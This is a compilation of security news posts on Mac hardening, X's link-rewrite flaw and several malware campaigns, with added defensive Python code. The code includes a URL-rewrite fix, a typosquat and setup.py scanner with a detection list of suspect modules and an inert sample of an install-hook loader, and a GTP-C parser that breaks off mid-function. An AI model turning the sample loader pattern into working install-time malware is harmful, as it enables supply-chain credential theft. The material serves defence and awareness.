1. Keep the device up-to-date: It is crucial to regularly update the Mac's operating system to incorporate the latest security patches. By staying current with updates, users can effectively address known vulnerabilities that may be exploited by malware.

2. Utilize antivirus software: Despite common misconceptions, Macs are not impervious to malware. Therefore, employing reputable antivirus software is highly recommended. Tools such as Malwarebytes offer free applications for individual users, capable of detecting and removing potential threats. Additionally, MacPaw’s CleanMyMac X now features a malware removal tool powered by MoonLock, enhancing protection against malicious software. 

3. Exercise caution when clicking: Email remains a primary vector for malware distribution, with phishing attacks experiencing a significant rise in success rates. According to recent reports, phishing success rates increased from 1% in 2022 to 9% in 2023. Hence, exercising caution and scepticism when interacting with email links and attachments is essential to mitigate the risk of falling victim to such attacks. 

4. Enable a firewall: Turning on the Mac's built-in application firewall blocks unsolicited incoming connections to apps and services that should not be reachable from the network. Note that it filters incoming connections only; controlling outbound traffic requires a third-party tool.

5. Use strong, unique passwords: Employing robust and distinctive passwords is imperative for bolstering the security of the Mac. Avoid using easily guessable passwords, such as common phrases or pet names followed by predictable characters. Instead, opt for complex combinations of letters, numbers, and symbols to enhance password strength and resilience against unauthorized access. 

6. Enable disk encryption: Leveraging features such as FileVault, which encrypts all user data stored on the disk in real-time, enhances the security of sensitive information on the Mac. In the event of device loss or theft, disk encryption ensures that the data remains inaccessible to unauthorized individuals, thereby safeguarding privacy and confidentiality. 

7. Limit user privileges: Use a standard (non-administrator) account for day-to-day work and reserve the administrator account for installing software and changing system settings. This prevents unauthorized installations and limits the damage a malware infection can do.

In summary, prioritizing the implementation of robust security measures is paramount in safeguarding the Mac against evolving threats. By adopting proactive strategies such as keeping the device updated, utilizing antivirus software, exercising caution when interacting with emails, enabling firewalls, employing strong passwords, enabling disk encryption, and limiting user privileges, users can significantly enhance the security posture of the Mac and protect against potential vulnerabilities and cyber threats.

X's URL Blunder Sparks Security Concerns

 



X, the social media platform formerly known as Twitter, recently dealt with a significant flaw in its iOS app: links to twitter.com were automatically rewritten to x.com within posts (Xeets), causing widespread concern among users. The intention was brand consistency, but the implementation created a security problem.

The flaw came from a rule that replaced any occurrence of "twitter" in a displayed URL with "x", regardless of context. Legitimate URLs containing that string were also affected, so users could unknowingly promote malicious websites: a link such as netflitwitter[.]com would be displayed as netflix.com while actually leading to a potentially harmful site.
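The fix is to parse the URL and rewrite the host component only when it really is twitter.com (or a subdomain of it), and never to let the displayed link text diverge from the real target. The Python below is an added illustration, not X's code: it puts the blind substring replacement next to a host-aware rewrite and adds the consistency check a client should make before rendering link text.

```python
from urllib.parse import urlsplit, urlunsplit

OLD_HOST = "twitter.com"
NEW_HOST = "x.com"


def naive_rewrite(url):
    """The failure mode described above: a blind substring replacement on the whole URL."""
    return url.replace("twitter", "x")


def host_aware_rewrite(url):
    """Rewrite only when the hostname is twitter.com or a subdomain of it, leaving the
    path, query, fragment and unrelated hosts untouched."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    if host != OLD_HOST and not host.endswith("." + OLD_HOST):
        return url
    new_host = host[: -len(OLD_HOST)] + NEW_HOST       # keep any subdomain prefix
    netloc = new_host
    if parts.port:
        netloc += f":{parts.port}"
    if parts.username:                                  # preserve userinfo if present
        cred = parts.username + (f":{parts.password}" if parts.password else "")
        netloc = f"{cred}@{netloc}"
    return urlunsplit((parts.scheme, netloc, parts.path, parts.query, parts.fragment))


def display_matches_target(display_url, target_url):
    """Safety check a client should run before showing link text: the hostname the
    user sees must be the hostname the click actually goes to."""
    shown = (urlsplit(display_url).hostname or "").lower()
    real = (urlsplit(target_url).hostname or "").lower()
    return shown == real


if __name__ == "__main__":
    for url in ("https://twitter.com/status/1", "https://netflitwitter.com/login"):
        print(url, "->", naive_rewrite(url), "|", host_aware_rewrite(url))
```

Because the hardened version compares the parsed hostname case-insensitively, it also closes the all-caps gap mentioned below: TWITTER.com is rewritten, and NETFLITWITTER.com is still left alone.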

The implications of this flaw were significant, as it could have facilitated phishing campaigns or distributed malware under the guise of reputable brands such as Netflix or Roblox. Despite the severity of the issue, X chose not to address it publicly, likely in an attempt to mitigate negative attention.

The glitch persisted for at least nine hours, possibly longer, before it was eventually rectified. Subsequent tests confirmed that URLs are now displaying correctly, indicating that the issue has been resolved. However, it's important to note that the auto-change policy does not apply when the domain is written in all caps.

This incident underscores the importance of thorough testing and quality assurance in software development, particularly for platforms with large user bases. It serves as a reminder for users to exercise caution when clicking on links, even if they appear to be from trusted sources.

To better understand how platforms like X operate and maintain user trust, it's essential to consider the broader context of content personalization. Profiles on X are utilised to tailor content presentation, potentially reordering material to better match individual interests. This customization considers users' activity across various platforms, reflecting their interests and characteristics. While content personalization enhances user experience, incidents like the recent security flaw highlight the importance of balancing personalization with user privacy and security concerns.
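The display-rewrite bug described above, as an added example that is not X's code: a bare string replacement beside a hostname-aware rewrite, plus the check a client should run before rendering a link (that its visible text names the host it really points to). Function names and the sample URLs are assumptions.

```python
"""
Added example (not X's code): the link-text bug described above, reproduced
as a bare string replacement, beside a hostname-aware rewrite that only
touches links whose parsed host really is the old domain.
"""
from urllib.parse import urlsplit, urlunsplit

OLD_DOMAIN = "twitter.com"
NEW_DOMAIN = "x.com"


def naive_display(url: str) -> str:
    """The bug class: replace the old domain wherever the substring occurs.
    'netflitwitter.com' turns into 'netflix.com'; an all-caps host is left
    alone only because str.replace is case-sensitive."""
    return url.replace(OLD_DOMAIN, NEW_DOMAIN)


def _is_domain_or_subdomain(host: str, domain: str) -> bool:
    return host == domain or host.endswith("." + domain)


def safe_display(url: str) -> str:
    """Rewrite the host only when it is exactly the old domain or a subdomain
    of it. Anything else, look-alikes included, is shown unchanged."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    if not _is_domain_or_subdomain(host, OLD_DOMAIN):
        return url
    new_host = host[: -len(OLD_DOMAIN)] + NEW_DOMAIN
    if parts.port is not None:
        new_host = f"{new_host}:{parts.port}"
    # userinfo (user:pass@host) is dropped on purpose: it has no place in a label
    return urlunsplit(parts._replace(netloc=new_host))


def label_misleads(label: str, href: str) -> bool:
    """Pre-render check: the text shown for a link must name the same host as
    the destination it actually navigates to."""
    shown = urlsplit(label if "//" in label else "//" + label).hostname or ""
    real = urlsplit(href).hostname or ""
    return shown.lower() != real.lower()
```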


The Vulture in Cyberspace: A Threat to Your Finances

In the digital landscape where information flows freely and transactions occur at the speed of light, a new predator has emerged. Aptly named the “Vulture,” this cyber threat silently circles its unsuspecting prey, waiting for the right moment to strike. Its target? Your hard-earned money, nestled securely within your bank account.

The Anatomy of the Vulture

The Vulture is not a physical bird of prey; it’s a sophisticated malware strain that infiltrates financial systems with surgical precision. Unlike its noisy counterparts, this digital menace operates silently, evading detection until it’s too late. Let’s dissect its anatomy:

Infiltration: The Vulture gains access through phishing emails, compromised websites, or infected software updates. Once inside, it nests within your device, waiting for the opportune moment.

Observation: Like a patient hunter, the Vulture observes your financial behavior. It tracks your transactions, monitors your balance, and studies your spending patterns. It knows when you receive your paycheck, pay bills, or indulge in online shopping.

Precision Attacks: When the time is right, the Vulture strikes. It initiates fraudulent transactions, transfers funds to offshore accounts, or even empties your entire balance. Its precision is chilling—no clumsy mistakes, just calculated theft.

The Revelation

The recent exposé by The Economic Times sheds light on the Vulture’s activities. According to cybersecurity researchers, this malware strain has targeted thousands of unsuspecting victims worldwide. Its modus operandi is both ingenious and terrifying:

Social Engineering: The Vulture exploits human vulnerabilities. It sends seemingly innocuous emails, masquerading as legitimate institutions. Clicking on a harmless-looking link is all it takes for the Vulture to infiltrate.

Zero-Day Vulnerabilities: The malware exploits unpatched software vulnerabilities. It thrives on the negligence of users who delay updates or ignore security warnings.

Money Mule Networks: The stolen funds don’t vanish into thin air. The Vulture employs intricate money mule networks—a web of unwitting accomplices who launder the money across borders.

Protecting Your Nest Egg

Fear not; there are ways to shield your finances from the Vulture’s talons:

Vigilance: Be wary of unsolicited emails, especially those requesting sensitive information. Verify the sender’s authenticity before clicking any links.

Software Updates: Regularly update your operating system, browsers, and security software. Patch those vulnerabilities before the Vulture exploits them.

Two-Factor Authentication: Enable two-factor authentication for your online accounts. Even if the Vulture cracks your password, it won’t get far without the second factor.

Monitor Your Accounts: Keep a hawk eye on your bank statements. Report any suspicious activity promptly.

Moving Ahead

The Vulture may be cunning, but we can outsmart it. By staying informed, adopting best practices, and maintaining digital hygiene, we can protect our nest eggs from this relentless predator. Remember, in cyberspace, vigilance is our armor, and knowledge is our shield.

Lazy Koala: New Cyber Threat Emerges in CIS Region

Cybersecurity researchers at Positive Technologies Expert Security Center (PT ESC) recently uncovered a new threat actor they've named Lazy Koala. Despite lacking sophistication, this group has managed to achieve significant results.

The report reveals that Lazy Koala is targeting enterprises primarily in Russia and six other Commonwealth of Independent States countries: Belarus, Kazakhstan, Uzbekistan, Kyrgyzstan, Tajikistan, and Armenia. Their victims belong to government agencies, financial institutions, and educational establishments. Their primary aim is to acquire login credentials for various services.

According to the researchers, nearly 900 accounts have been compromised so far. The purpose behind the stolen information remains unclear, but it's suspected that it may either be sold on the dark web or utilized in more severe subsequent attacks.

The modus operandi of Lazy Koala involves simple yet effective tactics. They employ convincing phishing attacks, often using native languages to lure victims into downloading and executing attachments. These attachments contain a basic password-stealing malware. The stolen files are then exfiltrated through Telegram bots, with the individual managing these bots being dubbed Koala, hence the group's name.

Denis Kuvshinov, Head of Threat Analysis at PT ESC, describes Lazy Koala's approach as "harder doesn't mean better." Despite their avoidance of complex tools and tactics, they manage to accomplish their objectives. Once the malware establishes itself on a device, it utilizes Telegram, a preferred tool among attackers, to exfiltrate stolen data.

PT ESC has notified the victims of these attacks, warning that the stolen information is likely to be sold on the dark web.

Are YouTube Game Cracks Hiding Malware?

Recently, cybersecurity researchers have unearthed a disturbing trend: threat actors are exploiting YouTube to distribute malware disguised as video game cracks. This trend poses a significant risk to unsuspecting users, especially those seeking free software downloads.

According to findings by Proofpoint Emerging Threats, cybercriminals are leveraging popular video-sharing platforms to target home users, who often lack the robust defences of corporate networks. The scheme involves creating deceptive videos offering free access to software and video game enhancements, but the links provided lead to malicious content.

The malware, including variants such as Vidar, StealC, and Lumma Stealer, is camouflaged within seemingly innocuous downloads, enticing users with promises of game cheats or software upgrades. What's particularly troubling is the deliberate targeting of younger audiences, with malicious content masquerading as enhancements for games popular among children.

The investigation uncovered several compromised YouTube accounts, with previously dormant channels suddenly flooded with English-language videos promoting cracked software. These videos, uploaded within a short timeframe, contained links to malware-infected files hosted on platforms like MediaFire and Discord.

One example highlighted by researchers featured a video claiming to enhance a popular game, accompanied by a MediaFire link leading to a password-protected file harbouring Vidar Stealer malware. Similarly, other videos promised clean files but included instructions on disabling antivirus software, further endangering unsuspecting users.

Moreover, cybercriminals exploited the identity of "Empress," a well-known entity within software piracy communities, to disseminate malware disguised as cracked game content. Visual cues provided within the videos streamlined the process of installing Vidar Stealer malware, presenting it as authentic game modifications.

Analysis of the malware revealed a common tactic of bloating file sizes to evade detection, with payloads expanding to approximately 800 MB. Furthermore, the malware utilised social media platforms like Telegram and Discord for command and control (C2) activities, complicating detection efforts.

Research into the matter has again underscored the need for heightened awareness among users, particularly regarding suspicious online content promising free software or game cheats. While YouTube has been proactive in removing reported malicious accounts, the threat remains pervasive, targeting non-enterprise users vulnerable to deceptive tactics.

As cybercriminals continue to refine their methods, it's imperative for individuals to exercise caution when downloading software from unverified sources. Staying informed about emerging threats and adopting cybersecurity best practices can help reduce the risk of falling victim to such schemes.


Linux Servers Targeted by DinodasRAT Malware

Recently, cybersecurity experts have noticed a concerning threat to Linux servers worldwide. Known as DinodasRAT (also referred to as XDealer), this malicious software has been identified targeting systems running Red Hat and Ubuntu operating systems. The campaign, suspected to have been operational since 2022, signifies a growing concern for server security.

While the Linux variant of DinodasRAT has been detected, details about its operation remain limited. However, previous versions have been traced back to 2021, indicating a persistent threat. Notably, DinodasRAT has previously targeted Windows systems in a campaign dubbed 'Operation Jacana,' focusing on governmental entities.

Trend Micro reported on the activities of a Chinese APT group identified as 'Earth Krahang,' utilising XDealer to breach both Windows and Linux systems of governmental organisations globally. This revelation underlines the severity and scope of the threat posed by DinodasRAT.

According to insights provided by Kaspersky researchers, the Linux version of DinodasRAT exhibits sophisticated behaviour upon execution. It establishes persistence on the infected device through System V or systemd startup scripts and creates a hidden file acting as a mutex to prevent multiple instances from running simultaneously. Furthermore, the malware communicates with a command and control (C2) server via TCP or UDP, encrypting the data it exchanges.

DinodasRAT possesses a range of capabilities designed to monitor, control, and exfiltrate data from compromised systems. These include tracking user activities, executing commands from the C2 server, managing processes and services, offering remote access to the attacker, proxying communications, downloading updates, and self-uninstallation to erase traces of its presence.

Kaspersky researchers emphasise that DinodasRAT provides threat actors with complete control over compromised systems, enabling data exfiltration and espionage. The malware primarily targets Linux servers, with affected victims identified in China, Taiwan, Turkey, and Uzbekistan since October 2023.

Despite the severity of the threat, details regarding the initial infection method remain undisclosed. Nevertheless, the sudden rise of DinodasRAT underscores the need for robust cybersecurity measures, especially for organisations relying on Linux servers for critical operations.

As cybersecurity experts continue to monitor and analyse this surge in emerging threats, proactive measures such as regular system updates, network monitoring, and employee training on security best practices become increasingly crucial in safeguarding against sophisticated threats like DinodasRAT.


PyPI Halts New User Registrations to Combat Malware Campaign

The Python Package Index (PyPI) has implemented a temporary halt on user registrations and the creation of new projects due to an ongoing malware scheme. PyPI serves as a central hub for Python projects, aiding developers in discovering and installing Python packages.

With a vast array of packages available, PyPI becomes an attractive target for malicious actors who often upload counterfeit or fraudulent packages, posing risks to software developers and potentially initiating supply-chain attacks. Consequently, PyPI administrators recently announced the suspension of new user registrations to address this malicious activity.

According to a report by Checkmarx, cyber threat actors began uploading 365 packages to PyPI, masquerading as legitimate projects. These packages contain malicious code within their 'setup.py' files, which triggers upon installation, attempting to retrieve additional harmful payloads from remote servers.

To avoid detection, the malicious code is encrypted using the Fernet module, and the remote server's URL is generated dynamically as required. The ultimate payload includes an information-stealing mechanism with persistence capabilities, targeting data stored in web browsers such as login credentials, cookies, and cryptocurrency extensions.

Checkmarx has published a comprehensive list of identified malicious entries, featuring numerous typosquatting variants of genuine packages. However, Check Point researchers reveal that the list of malicious packages exceeds 500 and was deployed in two phases. Each package originated from unique maintainer accounts with distinct names and email addresses.

The researchers note that each maintainer account uploaded only one package, suggesting the use of automation in orchestrating the attack. All entries shared the same version number, contained identical malicious code, and displayed randomly generated names.

This incident underscores the critical importance for software developers and package maintainers to rigorously verify the authenticity and security of components sourced from open-source repositories. Notably, this is not the first time PyPI has taken aggressive measures to protect its community from malicious submissions. Similar actions were taken on May 20 last year.

'Tycoon' Malware Kit Bypasses Microsoft and Google Multifactor Authentication

An emerging phishing kit called "Tycoon 2FA" is gaining widespread use among threat actors, who are employing it to target Microsoft 365 and Gmail email accounts. This kit, discovered by researchers at Sekoia, has been active since at least August and received updates as recently as last month to enhance its evasion techniques against multifactor authentication (MFA).

According to the researchers, Tycoon 2FA is extensively utilized in various phishing campaigns, primarily aimed at harvesting Microsoft 365 session cookies to bypass MFA processes during subsequent logins. The platform has amassed over 1,100 domain names between October 2023 and late February, with distribution facilitated through Telegram channels under different handles such as Tycoon Group, SaaadFridi, and Mr_XaaD.

Operating as a phishing-as-a-service (PhaaS) platform, Tycoon 2FA offers ready-made phishing pages for Microsoft 365 and Gmail accounts, along with attachment templates, starting at $120 for 10 days, with prices varying based on the domain extension. Transactions are conducted via Bitcoin wallets managed by the "Saad Tycoon Group," suspected to be the operator and developer of Tycoon 2FA, with over 1,800 recorded transactions as of mid-March.

The phishing technique employed by Tycoon 2FA involves an adversary-in-the-middle (AitM) approach, utilizing a reverse proxy server to host phishing webpages. This method intercepts user inputs, including MFA tokens, allowing attackers to bypass MFA even if credentials are changed between sessions.

Despite the security enhancements provided by MFA, sophisticated attacks like Tycoon 2FA pose significant threats by exploiting AitM techniques. The ease of use and relatively low cost of Tycoon 2FA make it appealing to threat actors, further compounded by its stealth capabilities that evade detection by security products.

Sekoia researchers outlined a six-stage process used by Tycoon 2FA to execute phishing attacks, including URL redirections, Cloudflare Turnstile challenges, JavaScript execution, and the presentation of fake authentication pages to victims.

The emergence of Tycoon 2FA underscores the evolving landscape of phishing attacks, challenging the effectiveness of traditional MFA methods. However, security experts suggest that certain forms of MFA, such as security keys implementing WebAuthn/FIDO2 standards, offer higher resistance against phishing attempts.

To assist organizations in identifying Tycoon 2FA activities, Sekoia has published a list of indicators of compromise (IoCs) on GitHub, including URLs associated with Tycoon 2FA phishing campaigns.

Is Your Data Safe? Fujitsu Discovers Breach, Customers Warned

Fujitsu, a leading Japanese technology company, recently faced a grave cybersecurity breach when it discovered malware on some of its computer systems, potentially leading to the theft of customer data. This incident raises concerns about the security of sensitive information stored by the company.

With a workforce of over 124,000 and an annual revenue of $23.9 billion, Fujitsu operates globally, providing a wide range of IT services and products, including servers, software, and telecommunications equipment. The company has a strong presence in over 100 countries and maintains crucial ties with the Japanese government, participating in various public sector projects and national security initiatives.

The cybersecurity incident was disclosed in a recent announcement on Fujitsu's news portal, revealing that the malware infection compromised several business computers, possibly allowing hackers to access and extract personal and customer-related information. In response, Fujitsu promptly isolated the affected systems and intensified monitoring of its other computers while continuing to investigate the source and extent of the breach.

Although Fujitsu has not received reports of customer data misuse, it has taken proactive measures by informing the Personal Information Protection Commission and preparing individual notifications for affected customers. The company's transparency and swift action aim to mitigate potential risks and restore trust among stakeholders.

This is not the first time Fujitsu has faced cybersecurity challenges. In May 2021, the company's ProjectWEB tool was exploited, resulting in the theft of email addresses and proprietary data from multiple Japanese government agencies. Subsequent investigations revealed vulnerabilities in ProjectWEB, leading to its discontinuation and replacement with a more secure information-sharing tool.

Fujitsu's response to the recent breach highlights the urgency of safeguarding sensitive data in these circumstances. The company's commitment to addressing the issue and protecting customer information is crucial in maintaining trust and credibility in the digital age.

As Fujitsu continues to investigate the incident, it remains essential for customers and stakeholders to remain careful and implement necessary precautions to mitigate potential risks. The company's efforts to enhance security measures and improve transparency are essential steps towards preventing future breaches and ensuring the integrity of its services and systems.


Cyber Attacks Threaten Essential Services

As per a recent report by BlackBerry, it was revealed that critical infrastructure providers faced a surge in cyberattacks during the latter part of 2023. Shockingly, these providers bore the brunt of 62% of all industry-related cyberattacks tracked from September through December. What’s more concerning is the 27% increase in the use of novel malware during this period, indicating a deliberate effort by threat actors to circumvent traditional defense mechanisms. With over 5,300 unique malware samples targeting BlackBerry’s customers daily, the urgency for enhanced cybersecurity measures becomes evident.

Threat actors are not only leveraging novel malware but also exploiting critical vulnerabilities in widely used products such as Citrix Netscaler, Cisco Adaptive Security Appliance, and JetBrains TeamCity. By exploiting these vulnerabilities, threat groups can infiltrate targeted organisations, posing a substantial risk to their operations. Additionally, VPN appliances remain highly attractive targets for state-linked threat actors, further stressing the need for heightened security measures across all sectors.

The backdrop of rising geopolitical tensions, including Russia’s invasion of Ukraine and escalating conflicts in the Asia-Pacific region, adds another layer of complexity to the situation. U.S. authorities have already issued warnings regarding the increased threat to critical infrastructure providers, particularly from state-sponsored groups like Volt Typhoon, with ties to the People’s Republic of China. These groups aim to disrupt essential services, potentially causing mass panic and diverting attention from other geopolitical agendas.

Ismael Valenzuela, VP of threat research and intelligence at BlackBerry, underscored the gravity of the situation, stating, “The end goal of attacks, whether from financially motivated attackers or nation states, is to cause havoc.” Organisations operating in critical infrastructure sectors understand the urgency to mitigate these threats promptly, often resorting to quick payments to restore operations.

Moreover, the report highlights the growing trend of attacks exploiting vulnerable VPN devices to gain unauthorised access to critical industries. Additionally, specific malware families like PrivateLoader, RisePro, SmokeLoader, and PikaBot have witnessed increased usage, further complicating cybersecurity efforts.

This spike in cyberattacks targeting critical infrastructure demands immediate attention from stakeholders worldwide. As threat actors continue to evolve their tactics, it is imperative for organisations to prioritise cybersecurity measures and stay cautious against emerging threats. Failure to do so could have severe implications not only for individual institutions but also for the stability of essential services and national security.


Exploitation of Windows SmartScreen Bypass Flaw Facilitates Deployment of DarkGate RAT

The operators behind the DarkGate malware have been taking advantage of a recently patched flaw in Windows SmartScreen through a phishing scheme. This campaign involves circulating counterfeit Microsoft software installers to spread the malicious code.

Researchers from Trend Micro, along with others, uncovered a vulnerability earlier this year, known as CVE-2024-21412, which allowed attackers to bypass security measures in Internet Shortcut Files. Microsoft addressed this issue in its February Patch Tuesday updates, but not before threat actors like Water Hydra and DarkGate seized the opportunity to exploit it. Trend Micro's Zero Day Initiative (ZDI) reported that DarkGate also utilized this flaw in a mid-January attack, enticing users with PDFs containing Google DoubleClick Digital Marketing (DDM) redirects, ultimately leading to compromised websites hosting the malware-laden installers.

According to Trend Micro researchers Peter Girnus, Aliakbar Zahravi, and Simon Zuckerbraun, the attackers manipulated Google-related domains using open redirects in conjunction with CVE-2024-21412 to circumvent Microsoft Defender SmartScreen protections, facilitating malware infections. They emphasized the effectiveness of combining fake software installers with open redirects in propagating infections.

DarkGate, described as a remote-access Trojan (RAT), has been advertised on Russian-language cybercrime forums since at least 2018 and is considered one of the most sophisticated and active malware strains. It offers various functionalities, including process injection, information theft, shell command execution, and keylogging, while employing multiple evasion techniques.

The DarkGate campaign observed by Trend Micro leverages Google Open Redirects, exploiting a previously patched SmartScreen vulnerability, CVE-2023-36025, affecting all supported Windows versions. By utilizing open redirects in Google DDM technologies, threat actors can execute malicious code when combined with security bypasses.

To defend against DarkGate's exploitation of CVE-2024-21412, Windows system administrators are advised to apply Microsoft's patch promptly. Additionally, organizations should prioritize employee training to raise awareness about the risks of installing software from untrusted sources. Continuous monitoring of the cyber environment, including identifying vulnerabilities and potential attack vectors, is crucial for effective cybersecurity defense.

In conclusion, proactive measures are necessary for both businesses and individuals to safeguard their systems against evolving threats like DarkGate and similar malware campaigns.

Japan Blames Lazarus for PyPi Supply Chain Attack

Japanese cybersecurity officials issued a warning that North Korea's infamous Lazarus Group recently launched a supply chain attack on the PyPI software repository for Python apps.

Threat actors disseminated contaminated packages with names like "pycryptoenv" and "pycryptoconf" that are comparable to the real "pycrypto" encryption tools for Python. Developers who are duped into installing the malicious packages onto their Windows workstations are infected with a severe Trojan called "Comebacker."

"The malicious Python packages confirmed this time have been downloaded approximately 300 to 1,200 times," Japan CERT noted in a warning issued late last month. "Attackers may be targeting users' typos to have the malware downloaded."

Comebacker is a general-purpose Trojan that can be used to deliver ransomware, steal passwords, and infiltrate the development pipeline, according to Dale Gardner, analyst and senior director at Gartner.

The trojan has been used in multiple attacks linked to North Korea, including one against an npm software development repository.

Impacting Asian Developers

Since PyPI is a centralised service with a global reach, developers worldwide should be aware of the most recent Lazarus Group campaign. 

"This attack isn't something that would affect only developers in Japan and nearby regions," Gardner explains. "It's something for which developers everywhere should be on guard." 

Several experts believe non-native English speakers may be more vulnerable to the Lazarus Group's most recent attack. Due to communication issues and limited access to security information, the attack "may disproportionately impact developers in Asia," stated Taimur Ijlal, a tech specialist and information security leader at Netify. 

According to Academic Influence's research director, Jed Macosko, app development groups in East Asia "tend to be more tightly integrated than in other parts of the world due to shared technologies, platforms, and linguistic commonalities." He believes intruders may be looking to take advantage of regional ties and "trusted relationships." 

Small and startup software businesses in Asia often have lower security budgets than their Western counterparts, according to Macosko. "This means weaker processes, tools, and incident response capabilities — making infiltration and persistence more attainable goals for sophisticated threat actors."

Cyber Defence

Protecting application developers from software supply chain threats is "difficult and generally requires a number of strategies and tactics," Gartner's Gardner explained. 

Developers should use extra caution and care while downloading open source dependencies. Given the amount of open source used today and the pressures of fast-paced development environments, it's easy for even a well-trained and vigilant developer to make a mistake, Gardner added. 

Gardner recommends using software composition analysis (SCA) tools to evaluate dependencies and detect fakes or legitimate packages that have been compromised. He also suggests "proactively testing packages for the presence of malicious code" and validating packages using package managers to minimise risk.
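Two of the checks Gardner describes, as an added example that is not code from Checkmarx, Check Point, JPCERT/CC or Gartner: it covers the look-alike package names from both PyPI posts above (the typosquatting variants in the 500-package campaign and the "pycryptoenv"/"pycryptoconf" names used here) and the install-time code in setup.py that the earlier post describes. The allowlist and the sample setup.py are constructed, and the function names are assumptions.

```python
"""
Added example, not code from Checkmarx, Check Point or JPCERT/CC: two checks
a developer can run before installing a dependency, matching the tactics the
PyPI posts describe: look-alike package names and install-time code in
setup.py. The allowlist and the sample setup.py are constructed.
"""
from __future__ import annotations

import ast
from dataclasses import dataclass

# Constructed allowlist: the packages a project has actually vetted.
TRUSTED = {"pycrypto", "pycryptodome", "requests", "numpy", "cryptography"}

# Modules and builtins that have no business in a setup.py that only declares metadata.
SUSPECT_MODULES = {"cryptography.fernet", "urllib.request", "requests", "socket",
                   "subprocess", "base64", "ctypes", "zlib"}
SUSPECT_CALLS = {"exec", "eval", "compile", "__import__"}


def levenshtein(a: str, b: str) -> int:
    """Plain edit distance (insert / delete / substitute)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def typosquat_candidates(name: str, trusted=TRUSTED, max_dist: int = 2) -> list[str]:
    """Trusted names that `name` resembles without being one of them.
    Two patterns: a few-character typo (requsts) and a trusted name with a
    short affix (pycryptoenv, pycryptoconf). Affix hits are review candidates,
    since some legitimate packages share a prefix with a trusted one."""
    norm = name.lower().replace("_", "-")
    if norm in trusted:
        return []
    hits = [t for t in trusted
            if levenshtein(norm, t) <= max_dist
            or (norm.startswith(t) and len(norm) - len(t) <= 4)]
    return sorted(hits)


@dataclass
class Finding:
    line: int
    reason: str


def scan_setup_py(source: str) -> list[Finding]:
    """Static pass over setup.py: suspect imports, dynamic execution, and a
    custom install command (cmdclass), the hook that runs code at install time."""
    findings: list[Finding] = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            mods = [a.name for a in node.names]
        elif isinstance(node, ast.ImportFrom):
            mods = [node.module or ""]
        else:
            mods = []
        for m in mods:
            if any(m == s or m.startswith(s + ".") for s in SUSPECT_MODULES):
                findings.append(Finding(node.lineno, f"imports {m}"))
        if (isinstance(node, ast.Call) and isinstance(node.func, ast.Name)
                and node.func.id in SUSPECT_CALLS):
            findings.append(Finding(node.lineno, f"calls {node.func.id}()"))
        if isinstance(node, ast.keyword) and node.arg == "cmdclass":
            findings.append(Finding(node.value.lineno, "overrides setup commands via cmdclass"))
    return findings


# Constructed sample in the shape both reports describe. Decode targets are
# placeholder strings, so this text is only parsed here, never executed.
SAMPLE_SETUP_PY = '''\
from setuptools import setup
from setuptools.command.install import install
import base64
from cryptography.fernet import Fernet

class PostInstall(install):
    def run(self):
        install.run(self)
        blob = base64.b64decode("<placeholder>")
        exec(Fernet(b"<placeholder-key>").decrypt(blob))

setup(name="requsts", version="1.0", cmdclass={"install": PostInstall})
'''
```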

Linux Malware GTPDOOR Exploits GPRS Roaming Networks to Target Telecom Companies

Security analysts have uncovered a fresh Linux malware named GTPDOOR, intended for deployment within telecom networks adjacent to GPRS roaming exchanges (GRX). What distinguishes this malware is its utilization of the GPRS Tunnelling Protocol (GTP) for commanding and controlling operations.

GPRS roaming enables subscribers to access their services even outside their home mobile network's coverage area. This is facilitated through a GRX, which routes roaming traffic via GTP between the visited and home Public Land Mobile Networks (PLMN).

Security expert haxrob, who stumbled upon two GTPDOOR artifacts uploaded to VirusTotal originating from China and Italy, suggests that this backdoor is likely linked to a known threat actor identified as LightBasin (also known as UNC1945). 

CrowdStrike previously disclosed this actor in October 2021 for a series of attacks targeting the telecom sector to pilfer subscriber data and call metadata.

Upon execution, GTPDOOR initially alters its process name to '[syslog]', mimicking syslog invoked from the kernel, and opens a raw socket to enable the implant to receive UDP messages through the network interfaces.

Essentially, GTPDOOR enables a threat actor with established persistence on the roaming exchange network to communicate with a compromised host by dispatching GTP-C Echo Request messages carrying a malicious payload.

These GTP-C Echo Request messages serve as a conduit for transmitting commands to execute on the infected system and relaying results back to the remote host. Furthermore, GTPDOOR can be discreetly probed from an external network by sending a TCP packet to any port number. If the implant is active, it returns a crafted empty TCP packet along with information on whether the destination port was open or responsive on the host.

According to the researcher, GTPDOOR appears tailored to reside on compromised hosts directly linked to the GRX network, which are the systems communicating with other telecommunication operator networks via GRX.
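The command channel just described, seen from the detection side, as an added example that is not from haxrob's write-up or any operator's tooling: a minimal GTPv1-C header parser and a check that flags Echo Requests carrying anything beyond the standard header, since a healthy Echo Request is a keep-alive with no payload. The sample datagrams are constructed and the implant's own command encoding is not reproduced; the UDP port, header layout and TEID rule follow the GTPv1 specification (3GPP TS 29.060).

```python
"""
Added example, not from haxrob's write-up or any operator's tooling: a
minimal GTPv1-C header parser plus a check that flags Echo Requests carrying
data beyond the header, the channel GTPDOOR abuses. Datagrams below are
constructed; the implant's own command encoding is not reproduced.
"""
import struct
from dataclasses import dataclass
from typing import List, Optional, Tuple

GTP_C_PORT = 2123           # UDP port for GTP-C signalling on the GRX
MSG_ECHO_REQUEST = 1
MSG_ECHO_RESPONSE = 2
IE_PRIVATE_EXTENSION = 255  # the only IE TS 29.060 allows in an Echo Request


@dataclass
class GtpHeader:
    version: int
    protocol_type: int      # 1 = GTP, 0 = GTP' (charging)
    msg_type: int
    length: int             # octets following the 8-byte mandatory header
    teid: int
    seq: Optional[int]      # present when any of the E/S/PN flags is set
    body: bytes             # whatever follows the optional 4-octet block


def parse_gtpv1(datagram: bytes) -> GtpHeader:
    """Decode the mandatory header and the optional sequence-number block."""
    if len(datagram) < 8:
        raise ValueError("datagram shorter than the GTP header")
    flags, msg_type, length, teid = struct.unpack("!BBHI", datagram[:8])
    version = flags >> 5
    if version != 1:
        raise ValueError(f"not a GTPv1 message (version {version})")
    body = datagram[8:8 + length]
    if len(body) != length:
        raise ValueError("length field disagrees with datagram size")
    seq = None
    if flags & 0x07:                     # E, S or PN flag set
        if len(body) < 4:
            raise ValueError("flags promise optional octets that are missing")
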